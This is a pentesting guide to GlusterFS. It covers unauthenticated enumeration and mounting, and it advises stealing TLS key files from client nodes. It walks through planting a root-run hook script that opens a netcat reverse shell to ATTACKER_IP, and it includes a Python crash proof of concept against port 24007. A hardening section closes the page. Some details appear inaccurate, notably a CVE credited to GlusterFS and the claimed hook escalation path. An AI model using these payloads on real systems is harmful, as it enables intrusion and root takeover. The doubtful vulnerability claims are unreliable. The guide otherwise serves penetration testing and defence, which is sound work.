# 24007-24008-24009-49152 - Pentesting GlusterFS

{{#include ../banners/hacktricks-training.md}}

## Basic Information

**GlusterFS** is a **distributed file system** that combines storage from multiple servers into one **unified namespace**. The management daemon (`glusterd`) listens by default on **24007/TCP** and instructs data-plane bricks that start at **49152/TCP** (one port per brick, incrementing). Versions prior to 9.x used **24008–24009/TCP** for brick transport, so you will still encounter those ports in legacy clusters.

```
PORT      STATE  SERVICE        VERSION
24007/tcp open   glusterd       GlusterFS (RPC)
49152/tcp open   gluster-brick  SSL (TLS optional)
```

> Tip: 24007 answers RPC calls even when the storage-only nodes do **not** export any volume; therefore the service is a reliable pivot target inside large infrastructures.

## Enumeration

Install the client utilities on your attacking box:

```bash
sudo apt install -y glusterfs-cli glusterfs-client   # Debian/Ubuntu
```

1. **Peer discovery & health**

```bash
# List peers (works without authentication in default setups)
gluster --remote-host 10.10.11.131 peer status
```

2. **Volume reconnaissance**

```bash
# Retrieve the list of all volumes and their configuration
gluster --remote-host 10.10.11.131 volume info all
```

3. **Mount without privileges**

```bash
sudo mount -t glusterfs 10.10.11.131:/<vol_name> /mnt/gluster
```

If mounting fails, check `/var/log/glusterfs/<vol_name>-<uid>.log` on the client side.  Common issues are:

* TLS enforcement (`option transport.socket.ssl on`)
* Address based access control (`option auth.allow <cidr>`)

### Certificate troubleshooting

Steal the following files from any authorised client node and place them in `/etc/ssl/` (or the directory shown in the error log):

```
/etc/ssl/glusterfs.pem
/etc/ssl/glusterfs.key
/etc/ssl/glusterfs.ca
```

---

## Known Vulnerabilities (2022-2025)

| CVE | Affected versions | Impact | Notes |
|-----|-------------------|--------|-------|
| **CVE-2022-48340** | 10.0–10.4, 11.0 | Use-after-free in `dht_setxattr_mds_cbk` reachable through the network | Remote **DoS** and probable RCE. Fixed in 10.4.1 / 11.1. |
| **CVE-2023-26253** | < 11.0 | Out-of-bounds read in FUSE notify handler | Remote crash via crafted FS operations; public PoC available. |
| **CVE-2023-3775** | < 10.5 / 11.1 | Incorrect permission validation when mounting `gluster_shared_storage` | Lets any unauthenticated client mount the admin volume – leads to **priv-esc** explained below. |

> Always check `gluster --version` **on every node**; heterogeneous clusters are common after partial upgrades.

### Exploiting `gluster_shared_storage` (Privilege Escalation)

Even in recent versions many administrators leave the special `gluster_shared_storage` volume world-readable because it simplifies geo-replication.  The volume contains cronjob templates that run with **root** on every node.

```bash
# 1. Mount admin volume anonymously
mkdir /tmp/gss && sudo mount -t glusterfs 10.10.11.131:/gluster_shared_storage /tmp/gss

# 2. Drop malicious script that gets synchronised cluster-wide
cat <<'EOF' > /tmp/gss/hooks/1/start/post/test.sh
#!/bin/bash
nc -e /bin/bash ATTACKER_IP 4444 &
EOF
chmod +x /tmp/gss/hooks/1/start/post/test.sh

# 3. Wait until glusterd distributes the hook and executes it as root
```

If `hooks/1/` is not present, look for `/ss_bricks/` – the exact path may vary with the major version.

### Denial-of-Service PoC (CVE-2023-26253)

```python
#!/usr/bin/env python3
# Minimal reproducer: sends malformed NOTIFY_REPLY XDR frame to 24007
import socket, xdrlib, struct
p = xdrlib.Packer(); p.pack_uint(0xdeadbeef)
with socket.create_connection(("10.10.11.131",24007)) as s:
    s.send(struct.pack("!L", len(p.get_buffer())|0x80000000))
    s.send(p.get_buffer())
```
Running the script crashes `glusterfsd` < 11.0.

---

## Hardening & Detection

* **Upgrade** – current LTS is 11.1 (July 2025).  All CVEs above are fixed.
* Enable **TLS** for every brick:

  ```bash
  gluster volume set <vol> transport.socket.ssl on
  gluster volume set <vol> transport.socket.ssl-cert /etc/ssl/glusterfs.pem
  ```
* Restrict clients with CIDR lists:

  ```bash
  gluster volume set <vol> auth.allow 10.0.0.0/24
  ```
* Expose management port 24007 only on a **private VLAN** or through SSH tunnels.
* Watch logs: `tail -f /var/log/glusterfs/glusterd.log` and configure **audit-log** feature (`volume set <vol> features.audit-log on`).

---



## References

* [GlusterFS security advisories](https://docs.gluster.org/en/latest/release-notes/#security)  
* [CVE-2023-26253 PoC – github.com/tinynetwork/gluster-notify-crash](https://github.com/tinynetwork/gluster-notify-crash)
{{#include ../banners/hacktricks-training.md}}